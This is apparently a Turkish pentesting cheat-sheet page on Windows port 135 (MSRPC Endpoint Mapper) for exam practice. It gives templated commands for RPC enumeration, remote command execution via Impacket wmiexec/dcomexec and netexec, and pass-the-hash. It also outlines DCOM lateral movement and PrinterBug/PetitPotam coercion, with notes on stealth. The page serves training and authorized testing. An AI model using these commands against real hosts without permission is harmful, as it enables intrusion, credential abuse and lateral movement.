135
MSRPC / EPMAP (Endpoint Mapper)
windows135/tcp Windows uzerinde RPC Endpoint Mapper'dir; rpcdump ile DCOM/WMI/MS-RPRN gibi servislerin dinamik portlarini cikarir, WMI ve DCOM uzerinden uzaktan komut yurutme (impacket-wmiexec/dcomexec) ve domain enumerasyonu icin pivot noktasidir.
┌──
Komutlar
impacket-rpcdump ✓ EXAM-SAFE
impacket-rpcdump @{{RHOST}} Kimliksiz RPC endpoint dump — UUID'ler, named pipe'lar ve dinamik portlar. MS-RPRN/MS-EFSR varligini arayin. Impacket — rpcdump
rpcdump.py ✓ EXAM-SAFE
rpcdump.py @{{RHOST}} | grep -E 'MS-RPRN|MS-EFSR|MS-TSCH|MS-SCMR' Coercion ve lateral movement icin onemli arabirimleri filtreleyin (PrinterBug / PetitPotam / Task Scheduler / SCM). HackTricks — Pentesting MSRPC
nmap ✓ EXAM-SAFE
nmap -n -sV -p135 --script msrpc-enum,rpc-grind {{RHOST}} 135 servis/suruum tespiti ve MSRPC enumerasyon NSE script'leri. Nmap NSE — msrpc-enum
impacket-wmiexec ✓ EXAM-SAFE user
impacket-wmiexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} WMI (IWbemServices) uzerinden yari-etkilesimli komut yurutme; kimlikli, gorece sessiz. Impacket — wmiexec
impacket-wmiexec ✓ EXAM-SAFE user
impacket-wmiexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} Pass-the-Hash ile WMI exec — parola yerine NT hash kullanir. Impacket — wmiexec (PtH)
impacket-dcomexec ✓ EXAM-SAFE user
impacket-dcomexec -object MMC20 {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}} DCOM (MMC20.Application) uzerinden komut yurutme — WMI bloklandiginda alternatif. Impacket — dcomexec
netexec ✓ EXAM-SAFE user
netexec wmi {{RHOST}} -u {{USER}} -p '{{PASS}}' -x 'whoami' NetExec wmi protokolu ile 135 uzerinden komut dogrulama / hizli exec. NetExec — wmi protocol
MSRPC / EPMAP (135) Nedir
Windows’ta 135/tcp RPC Endpoint Mapper (EPMAP) portudur. Bir SQL/DNS portu gibi tek servis sunmaz; istemciye “hangi RPC arabirimi hangi dinamik portta dinliyor” bilgisini veren bir kayit defteri gibi calisir. Cikan UUID’ler size DCOM, WMI (IWbemServices), Task Scheduler (MS-TSCH), Spooler (MS-RPRN — PrintNightmare/PetitPotam ipucu), Service Control Manager (MS-SCMR) gibi saldiri yuzeylerini gosterir.
Enumeration
impacket-rpcdumpile kimliksiz veya kimlikli olarak tum RPC endpoint’lerini ve dinamik portlari listeleyin. Cikan MS-RPRN (12345678-1234-...) varligi PrintNightmare/PrinterBug; MS-EFSR varligi PetitPotam icin sinyaldir.nmapNSEmsrpc-enumverpc-grindile servis tespiti yapin.- Domain ortaminda 135, lsarpc/samr gibi named pipe’lara giden DCERPC trafiginin kapisidir; gercek loot genelde 445 uzerinden SMB named pipe ile gelir ama bazi araclar dogrudan 135’in dinamik portlarini kullanir.
Bilinen Zafiyet / Saldiri Yuzeyi
- DCOM lateral movement:
MMC20.Application,ShellWindows,ShellBrowserWindowDCOM nesneleri uzerinden uzak komut. - WMI exec:
IWbemServicesarabirimi ileWin32_Process.Createcagrisi. - Coercion: MS-RPRN (PrinterBug) ve MS-EFSR (PetitPotam) ile NTLM relay zorlamasi (relay hedefi cogunlukla LDAP/SMB olur).
Exploitation / Auth (kimlik gerekli)
Gecerli kimlik bilgisi ({{USER}}/{{PASS}} ya da PtH icin {{NTHASH}}) ele gecince:
impacket-wmiexec→ 135 (+49152+ dinamik) uzerinden yari-etkilesimli shell, disk uzerinde minimal iz.impacket-dcomexec→ DCOM tabanli, WMI engellendiginde alternatif. Bu metodlar OSCP’de safe kabul edilir (manuel, Impacket).
Notlar / Pivot
- WMI genelde event log’a
wmiexecartifaktlari birakir; ama yeni servis kurmadigi icin PsExec’e gore daha sessizdir. - 135 acik + 445 kapali nadir bir senaryodur; ikisi birlikte degerlendirilir. rpcdump ciktisini Active Directory enumerasyon notlarinizla birlestirin (DC tespiti, coercion adaylari).
- Hicbir komutta sabit IP kullanmayin; hedefi her zaman
{{RHOST}}/{{DC_IP}}token’i ile verin.
┌──
İlgili teknikler
┌──